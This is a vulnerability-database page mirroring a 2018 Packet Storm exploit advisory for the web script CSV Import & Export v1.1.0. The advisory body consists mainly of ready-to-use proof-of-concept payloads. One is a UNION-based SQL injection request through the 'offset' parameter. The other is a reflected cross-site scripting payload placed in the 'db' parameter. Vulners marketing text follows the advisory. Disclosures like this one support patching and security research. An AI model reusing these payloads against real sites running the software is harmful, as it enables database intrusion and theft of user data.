Lucene search
K

CSV Import And Export 1.1.0 Cross Site Scripting / SQL Injection

🗓️ 31 May 2018 00:00:00Reported by Kagan CaparType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

CSV Import & Export v1.1.0 SQL Injection / Cross-Site Scriptin

Code
`# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site Scripting  
# Dork: N/A  
# Date: 30.05.2018  
# Exploit Author: Kagan Capar  
# Contact: [email protected]  
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509  
# Version: 1.1.0  
# Category: Webapps  
# Tested on: Kali Linux  
# Description : The 'offset' and 'db' parameters in the database table  
preview query has vulnerabilities.  
====================================================  
# PoC : SQLi :  
  
Parameter: offset (GET)  
Type: UNION query  
Demo:  
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10  
Title: Generic UNION query (NULL) - 10 columns  
Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30  
UNION ALL SELECT  
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--  
STgb&limit=10  
  
  
====================================================  
# PoC : XSS :  
  
Payload =  
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation